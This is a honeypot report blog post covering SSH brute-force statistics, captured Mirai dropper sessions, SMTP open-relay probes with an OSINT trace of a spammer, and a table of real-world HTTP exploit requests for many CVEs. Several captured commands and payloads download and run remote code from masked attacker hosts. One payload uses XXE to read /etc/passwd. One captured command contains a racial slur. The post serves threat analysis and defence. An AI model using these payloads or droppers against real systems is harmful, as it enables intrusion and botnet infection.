Honeypot Chronicles: Insights into the loot of a honeypot
This blog post presents some findings from one of my honeypots. Unfortunately, I haven't documented everything that might have been worth sharing over the years, but I've captured some interesting details over the past few weeks. IP addresses and domain names have been removed so you can navigate and copy-paste safely through this post. They can still be traced with a simple Google search.
22 - SSH
Over approximately 14 days, there were 27,840 login attempts, averaging 1.35 attempts per minute.
Top 20 user:password combinations
Combo | # of attempts |
---|---|
support:support | 582 |
root:0 | 84 |
admin:admin | 49 |
root:abcd1234 | 46 |
root:root | 45 |
naveen:naveen123 | 29 |
max:max!123 | 29 |
user:user | 28 |
root:admin | 26 |
naveen:kjashd123sadhj123dhs1SS | 25 |
oracle:oracle!@#$ | 25 |
ftpuser:ftpuser | 25 |
ftpuser:admin | 24 |
craft:craft!@# | 23 |
sa:Sa123 | 23 |
root:123456 | 23 |
ansuser:Ansuser1 | 22 |
root:toor | 22 |
dockeradmin:Dockeradmin1234 | 21 |
deployer:deployer!123 | 21 |
In my previous honeypots, the top username combinations varied slightly each time. This time, however, the combination "support:support" was heavily targeted by the same actors, which inflated its count. Despite this, the set of unique combinations remains mostly consistent, even though their rankings differ. You can download the complete password list here.
Most attacks by country
Country | # of attacks |
---|---|
EC | 14595 |
CN | 7944 |
US | 1367 |
RU | 683 |
NL | 446 |
IN | 412 |
KR | 333 |
BG | 313 |
HK | 232 |
BR | 135 |
Ecuador is an unusual source for such a high volume of login attempts. In fact, a single IP was responsible for all 14,595 attempts, made in a timespan of over 4 hours.
Analyzing the attackers based solely on IP addresses provides a clearer perspective.
Most attackers by country:
Country | # of attackers |
---|---|
CN | 430 |
US | 190 |
KR | 170 |
IN | 143 |
BR | 82 |
HK | 76 |
SE | 68 |
RU | 62 |
ID | 52 |
IQ | 42 |
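To reproduce the two views of the same data shown above (attempts versus distinct attackers), here is an added example that is not part of the original post: it aggregates Cowrie-style JSON-lines login events into the three tables and, per country, reports the share of attempts coming from its single busiest IP, which is what exposes a case like the one Ecuadorian address. The log records are constructed, and the country field is assumed to come from a GeoIP enrichment step (Cowrie itself only logs src_ip).

```python
import json
from collections import Counter

# Constructed sample records in Cowrie-style JSON-lines form (not real capture data).
# "country" is an assumed GeoIP enrichment field; the other keys are Cowrie's own.
SAMPLE_LOG = """\
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.10","country":"EC","username":"support","password":"support"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.10","country":"EC","username":"support","password":"support"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.10","country":"EC","username":"root","password":"0"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","country":"CN","username":"admin","password":"admin"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.8","country":"CN","username":"root","password":"root"}
{"eventid":"cowrie.login.success","src_ip":"198.51.100.9","country":"US","username":"admin","password":"admin"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.9","country":"US","input":"uname -a"}
"""


def summarize(log_text):
    """Count login attempts three ways: per user:password combo, per country,
    and per country by distinct source IP, plus each country's busiest-IP share."""
    combos = Counter()
    attacks = Counter()
    per_ip = {}  # country -> Counter(src_ip -> attempts)
    for line in log_text.splitlines():
        rec = json.loads(line)
        if not rec["eventid"].startswith("cowrie.login."):
            continue  # only authentication events count as attempts
        combos[f'{rec["username"]}:{rec["password"]}'] += 1
        attacks[rec["country"]] += 1
        per_ip.setdefault(rec["country"], Counter())[rec["src_ip"]] += 1
    attackers = {c: len(ips) for c, ips in per_ip.items()}
    # Share of a country's attempts produced by its single busiest IP (1.0 = one actor).
    dominance = {c: max(ips.values()) / attacks[c] for c, ips in per_ip.items()}
    return {"combos": combos, "attacks": attacks,
            "attackers": attackers, "dominance": dominance}


if __name__ == "__main__":
    r = summarize(SAMPLE_LOG)
    for country in r["attacks"]:
        print(country, r["attacks"][country], r["attackers"][country],
              f'{r["dominance"][country]:.2f}')
```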
Interactive Honeypot
My honeypot was configured to allow fake access under certain conditions. So, what happens when an attacker triggers a "valid" login?
Often, nothing significant happens. Some attackers merely perform automatic banner-grabbing after login, while others go further and attempt to execute commands. This behavior could also be influenced by bugs in my honeypot, or by the honeypot itself looking suspicious to the attacker.
admin:admin

```text
system
shell
sh
linuxshell
cd /tmp/; echo "senpai" > rootsenpai; cat rootsenpai; rm -rf rootsenpai
rm -rf boobs.sh; rm -rf miori.*; wget http://bad_actor_address.shop/askljdghreg/boobs.sh || curl -O http://bad_actor_address.shop/askljdghreg/boobs.sh || tftp bad_actor_address.shop/askljdghreg -c get boobs.sh || tftp -g -r boobs.sh bad_actor_address.shop/askljdghreg; chmod 777 boobs.sh;./boobs.sh ssh; rm -rf boobs.sh
```

boobs.sh

```sh
server_ip="bad_actor_address.shop/askljdghreg"
for arch in $binarys
do
wget http://$server_ip/$arch || curl -O $binout http://$server_ip/$arch || tftp $server_ip -c get $arch || tftp -g -r $arch $server_ip
chmod 777 $arch
./$arch ssh
rm -rf $arch
done
```

bin.x86_64

Yep, it's Mirai (VirusTotal: 23/68).
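The session above follows the usual dropper shape, and the next one adds a process-killing loop. As an added example (not the honeypot's code and not from the original post), here is a small classifier that turns those behaviours into named indicators a SOC can alert on: the /tmp write probe, the wget/curl/tftp fallback chain, the chmod-run-delete sequence, and the /proc maps killer from the second session further down. The command lines are constructed reproductions of the captures on this page, with the attacker host kept as this page's placeholder; the indicator names are my own.

```python
import re

# Constructed reproductions of the captured command lines (placeholder host kept);
# "uname -a" is a benign control that should match nothing.
SESSION = [
    'cd /tmp/; echo "senpai" > rootsenpai; cat rootsenpai; rm -rf rootsenpai',
    'rm -rf boobs.sh; wget http://bad_actor_address.shop/x/boobs.sh || '
    'curl -O http://bad_actor_address.shop/x/boobs.sh || '
    'tftp -g -r boobs.sh bad_actor_address.shop/x; chmod 777 boobs.sh;./boobs.sh ssh; rm -rf boobs.sh',
    'for proc_dir in /proc/[0-9]*; do pid=${proc_dir##*/}; buffer=$(cat "/proc/$pid/maps"); '
    'if [ "${buffer#*"/lib/"}" = "$buffer" ]; then kill -9 "$pid"; fi; done',
    'uname -a',
]

# One regex per behaviour, applied to a single captured command line.
INDICATORS = {
    # write a marker file, read it back, delete it: probing whether /tmp is writable
    "tmp_write_probe": r"cd /tmp/?;\s*echo\s+\S+\s*>\s*([^\s;]+);\s*cat\s+\1;\s*rm\s+-rf\s+\1",
    # several downloaders chained with || so at least one exists on a minimal busybox
    "fallback_download": r"\b(wget|curl|tftp)\b[^;|]*\|\|\s*(wget|curl|tftp)\b",
    # make the payload executable, run it, then remove it from disk
    "chmod_exec_delete": r"chmod\s+[0-7]*7[0-7]*\s+([^\s;]+);\s*\./\1\b.*?;\s*rm\s+-rf\s+\1",
    # walk /proc, read each process's maps and kill competitors (bot-vs-bot cleanup)
    "proc_maps_killer": r"/proc/\[0-9\]\*.*?/maps.*?\bkill\s+-9\b",
}
COMPILED = {name: re.compile(rx) for name, rx in INDICATORS.items()}


def dropper_indicators(command):
    """Return the names of all indicators that match one captured command line."""
    return {name for name, rx in COMPILED.items() if rx.search(command)}


def score_session(commands):
    """Union of indicators over a whole session; two or more is a strong dropper signal."""
    hits = set()
    for command in commands:
        hits |= dropper_indicators(command)
    return hits


if __name__ == "__main__":
    for command in SESSION:
        print(sorted(dropper_indicators(command)) or "-", "<=", command[:60])
```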
admin:admin

```text
system
shell
sh
linuxshell
sudo su
cd /tmp/; echo "nigger" > fileout; cat fileout; rm -rf fileout
for proc_dir in /proc/[0-9]*; do pid=${proc_dir##*/}; buffer=$(cat "/proc/$pid/maps"); if [ "${#buffer}" -gt 1 ]; then if [ "${buffer#*"/lib/"}" = "$buffer" ] && [ "${buffer#*"/lib64/"}" = "$buffer" ] && [ "${buffer#*"telnetdbot"}" = "$buffer" ]; then kill -9 "$pid"; fi; fi; done
rm -rf ssh.sh; wget http://87.xxx.xxx.xx/ssh.sh || curl -O http://87.xxx.xxx.xx/ssh.sh || tftp 87.xxx.xxx.xx -c get ssh.sh || tftp -g -r ssh.sh 87.xxx.xxx.xx; chmod 777 ssh.sh;./ssh.sh ssh; rm -rf ssh.sh
```

ssh.sh

```sh
server_ip="87.xxx.xxx.xxx"
binout="runmeplz"
rm -rf $binout
for arch in $binarys
do
rm -rf $arch
wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip
chmod 777 $binout
./$binout $1
rm -rf $binout
done
```

x86

Yep, it's Mirai (VirusTotal: 18/68).

25 - SMTP
Port 25 is commonly used for sending and receiving emails, making it a frequent target for spammers scanning for open relays. Typically, they don't immediately send spam but start by sending test emails to one of their own addresses. I've frequently received emails in a consistent format, leading me to believe there's a script or application that checks for open relays. The email addresses used in these tests vary, but this pattern has persisted for over a year.
```text
MAIL FROM:
RCPT TO:
DATA
Message-ID:
From:
To:
Subject: Valid SMTP XXX.XXX.XXX.XXX
Date: Mon, 01 Aug 2024 12:34:56 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="_unique_id"
This is a multi-part message in MIME format.
--*boundary*
Content-Type: text/plain;
charset="utf-8"
Content-Transfer-Encoding: quoted-printable
XXX.XXX.XXX.XXX:25 | no auth | SSL: True | Hostname: =
honeypot.hoster.com
--*boundary*
Content-Type: text/html;
charset="utf-8"
Content-Transfer-Encoding: quoted-printable
XXX.XXX.XXX.XXX:25 | no auth | SSL: True | Hostname: =
honeypot.hoster.com
--*boundary*--
.
Quit
```
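Because the probe format is this stable, it can be fingerprinted at the honeypot instead of being spotted by eye. The following is an added example, not part of the original post: it parses a constructed reproduction of the message above with Python's email package, decodes the quoted-printable soft line break ("=" at end of line) that splits the hostname across two lines in the capture, and extracts the fields the relay checker reports. The IP, addresses and hostname are placeholders.

```python
import email
import re
from email import policy

# Constructed reproduction of the open-relay probe (192.0.2.10 and the addresses are
# documentation placeholders; the body format is the one seen in the capture).
PROBE = """\
Message-ID: <probe@example.invalid>
From: relaytest@example.invalid
To: relaytest@example.invalid
Subject: Valid SMTP 192.0.2.10
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="_unique_id"

This is a multi-part message in MIME format.
--_unique_id
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: quoted-printable

192.0.2.10:25 | no auth | SSL: True | Hostname: =
honeypot.hoster.com
--_unique_id
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable

192.0.2.10:25 | no auth | SSL: True | Hostname: =
honeypot.hoster.com
--_unique_id--
"""

SUBJECT_RE = re.compile(r"^Valid SMTP (\d{1,3}(?:\.\d{1,3}){3})$")
BODY_RE = re.compile(r"^(?P<ip>[\d.]+):(?P<port>\d+) \| (?P<auth>[^|]+?) \| "
                     r"SSL: (?P<ssl>True|False) \| Hostname: (?P<host>\S+)$")


def classify_relay_probe(raw):
    """Return the fields of an open-relay probe, or None if the message is not one."""
    msg = email.message_from_string(raw, policy=policy.default)
    subject = SUBJECT_RE.match(str(msg["Subject"] or ""))
    if not subject:
        return None
    part = msg.get_body(preferencelist=("plain",))
    if part is None:
        return None
    # get_content() undoes the quoted-printable encoding, including the "=" soft
    # line break, so the hostname is whole again before matching.
    body = BODY_RE.match(part.get_content().strip())
    if not body or body["ip"] != subject.group(1):
        return None  # subject and body must name the same relay
    return {"ip": body["ip"], "port": int(body["port"]), "auth": body["auth"].strip(),
            "ssl": body["ssl"] == "True", "host": body["host"]}
```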
Interestingly, some of the email addresses used for receiving test emails have been in use since at least 2017. Despite this, most of them don't appear in any public records, breaches, or even Google search results. Occasionally, these addresses are reused to register with online services such as forums, but those accounts typically remain inactive, with no posts or comments.
What happens if you forward one of these emails?
In my experience, the spammer sends test emails to various mail providers (Outlook, Gmail, Yahoo, etc.) primarily to check if the SMTP server can successfully deliver emails to these inboxes.
Do these e-mail addresses get reused?
Yes!
This spammer also used unique usernames that can be found on social media platforms. These usernames don't appear in any breaches, and the accounts remain inactive or empty anyway.
Let's look at the breaches:
Breach #1 (2015)
Username | Email | Password |
---|---|---|
United Nations Office Nigeria | d****[email protected] | b****2015 |
United Nations | d****h1@yahoo.com | b****2015 |
Breach #2 (2014)
Username | Email | Password |
---|---|---|
k***o | d****[email protected] | b****2015 |
Social Media accounts
Due to the reuse of the username and email, along with some targeted Google searches and the ability to test email and username combinations on Twitter, I was able to find the spammer's Twitter account, which was created in 2010. The only other account using this username is a TikTok account from 2023. While I can't definitively verify that the TikTok account belongs to the spammer, the uploaded pictures and the reuse of the unique username strongly suggest that it does.

80 - HTTP
Several payloads have been stripped down for readability, but the content remains unedited. If a vulnerability was exploited using multiple payloads, I've selected the most interesting one.
Currently actively exploited vulnerabilities
CVE | Payload |
---|---|
CVE-2023-1389 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2Fxxx.xxx.xxx.xxx%2Ft%7Csh%3B%60) HTTP/1.1 |
CVE-2023-26801 | POST /goform/set_LimitClient_cfg HTTP/1.1 cookie: user=admin time1=00:00-00:00&time2=00:00-00:00&mac=;killall -9 mpsl; killall -9 bash.mpsl; killall -9 mips; killall -9 tsuki.mpsl; killall -9 skid.mpsl;rm -rf blink; wget http://xxx.xxx.xxx.xxx/blink; chmod 777 blink; ./blink blink; rm -rf blink; |
CVE-2022-30023 | GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0 |
CVE-2021-41773, CVE-2021-42013 | POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1 connection: keep-alive content-length: 101 upgrade-insecure-requests: 1 content-type: text/plain host: xxx.xxx.xxx.xxx:80 accept: */* user-agent: Custom-AsyncHttpClient X=$(curl http://xxx.xxx.xxx.xxx/sh || wget http://xxx.xxx.xxx.xxx/sh -O-); echo "$X" \| sh -s apache.selfrep |
CVE-2018-10562, CVE-2018-10561 | POST /GponForm/diag_Form?images/ HTTP/1.1 content-length: 118 accept-encoding: gzip, deflate connection: keep-alive user-agent: Hello, World host: 127.0.0.1:80 accept: */* XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://xxx.xxx.xxx.xxx:48333/Mozi.m+-O+->/tmp/gpon80 |
CVE-2019-18935 | GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 |
CVE-2021-21972, CVE-2021-21973 | POST /sdk HTTP/1.1 user-agent: Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/) host: xxx.xxx.xxx.xxx connection: close content-length: 441 <soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope> |
CVE-2017-9841 | GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 content-length: 33 content-type: text/plain upgrade-insecure-requests: 1 connection: keep-alive user-agent: Custom-AsyncHttpClient host: xxx.xxx.xxx.xxx:80 accept: */* <?php echo(md5("Hello PHPUnit")); GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 host: xxx.xxx.xxx.xxx accept-encoding: gzip, deflate connection: keep-alive content-length: 79 user-agent: python-requests/2.32.3 accept: */* <?php system("wget https://pastebin.com/raw/xxxxxx -O XsamXadoo_Bot.php"); ?> |
Exploit-DB 46150 | GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1 upgrade-insecure-requests: 1 user-agent: Custom-AsyncHttpClient host: xxx.xxx.xxx.xxx:80 connection: keep-alive accept: */* |
Exploit-DB 25978 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://xxx.xxx.xxx.xxx:45367/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.1 |
CVE-2021-44228 (Log4Shell) | GET /t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ x-api-version: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ user-agent: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ x-real-ip: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ cookie: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ originating-ip: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ x-forwarded-for: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ referrer: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ bearer: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ Host: xxx.xxx.xxx.xxx:8080 x-client-ip: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ x-forwarded-host: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ accept: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ connection: close authentication: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ x-druid-comment: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ cf-connecting_ip: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ x-requested-with: t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//xxx.xxx.xxx.xxx:3306/Command/Base64/ |
CVE-2024-32113 | POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1 host: xxx.xxx.xxx.xxx:80 content-length: 147 user-agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0 content-type: application/x-www-form-urlencoded upgrade-insecure-requests: 1 connection: keep-alive accept: */* groovyProgram=throw+new+Exception('curl http://xxx.xxx.xxx.xxx/sh \| sh -s elf || wget -O- http://xxx.xxx.xxx.xxx/sh \| sh -s elf'.execute().text); |
CVE-2019-9670 | POST /Autodiscover/Autodiscover.xml HTTP/1.1 host: xxx.xxx.xxx.xxx:8080 content-length: 314 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 content-type: application/xml accept-encoding: gzip connection: close <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> <Request> <EMailAddress>aaaaa</EMailAddress> <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema> </Request> </Autodiscover> |
Vacron NVR RCE | GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://xxx.xxx.xxx.xxx:53035/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron HTTP/1.0 |
CVE-2015-2051 | POST /HNAP1/ HTTP/1.0 content-length: 640 host: xxx.xxx.xxx.xxx:80 soapaction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://xxx.xxx.xxx.xxx:40194/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` content-type: text/xml; charset="utf-8" <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
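Two rows above hide their intent behind encoding: the Apache request double-encodes each dot (%%32%65 becomes %2e and then a plain dot), and the Log4Shell request assembles ${jndi:ldap://...} out of ${env:NaN:-x} lookups, each of which evaluates to its default value because the variable is never set. As an added example, not from the original post, here is defender-side normalization that undoes both before a signature is matched; the request fragments are constructed from the captured rows with a placeholder address, and the ${lower:x}/${upper:x} variant it also handles is not on this page.

```python
import re
from urllib.parse import unquote

# Constructed request fragments modelled on the captured rows above (placeholder address).
TRAVERSAL = "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh"
LOG4SHELL = ("t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap"
             "$%7Benv:NaN:-:%7D//203.0.113.5:3306/Command/Base64/")


def normalize_path(path, rounds=3):
    """Percent-decode until stable: %%32%65 -> %2e -> '.', so a traversal encoded
    twice (CVE-2021-42013) looks the same as a plain one (CVE-2021-41773)."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_traversal(path):
    p = normalize_path(path)
    return "/../" in p or p.startswith("../") or p.endswith("/..")


# ${prefix:key:-default} evaluates to "default" when the key is unset (env:NaN never is).
DEFAULT_LOOKUP = re.compile(r"\$\{[A-Za-z]+:[^${}]*:-([^${}]*)\}")
# ${lower:x} / ${upper:x} variant (not in the captures above, but common in the wild).
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}")


def deobfuscate_lookups(value):
    """Collapse nested Log4j lookups to the string they would evaluate to."""
    s = unquote(value)
    while True:
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), s)
        new = CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(), new)
        if new == s:
            return s
        s = new  # innermost lookups resolved; loop again for the next layer


JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def is_log4shell(value):
    """True if a URL or header value resolves to a ${jndi:...} lookup."""
    return JNDI.search(deobfuscate_lookups(value)) is not None
```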
Currently Exploited Vulnerable Configurations
Description | Payload |
---|---|
Start a debugging session with PhpStorm | GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 |
Misconfiguration in which an administrator enables a Cisco router's HTTP admin interface without password protection | GET /level/15/exec/-/sh/run/CR HTTP/1.1 |
Search for phpMyAdmin panels | GET /phpMyAdmin/scripts/setup.php HTTP/1.0 GET http://xxx.xxx.xxx.xxx:8080/phpMyAdmin/scripts/setup.php HTTP/1.0 GET http://xxx.xxx.xxx.xxx:8080/phpmyadmin/scripts/setup.php HTTP/1.0 GET http://xxx.xxx.xxx.xxx:8080/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0 |
Search for an enabled Spring Actuator API | GET /actuator/gateway/routes HTTP/1.1 |
Search for open HTTP proxies | CONNECT example.com:443 HTTP/1.1 user-agent: Go-http-client/1.1 host: example.com:443 |
Unknown Datadog package | GET / HTTP/1.1 host: xxx.xxx.xxx.xxx accept-encoding: gzip, deflate connection: keep-alive user-agent: python-requests/2.32.2 x-datadog-trace-id: <random integer> accept: */* x-datadog-parent-id: <random integer> x-datadog-sampling-priority: 1 |
Analysis of various payloads
While most binaries are boring Mirai samples, with the occasional interesting IRC bot (yes, they still exist!) that allows you to chat with the bot operator, some shell scripts contained somewhat intriguing content.
Advertisement for the Attackers' DDoS Service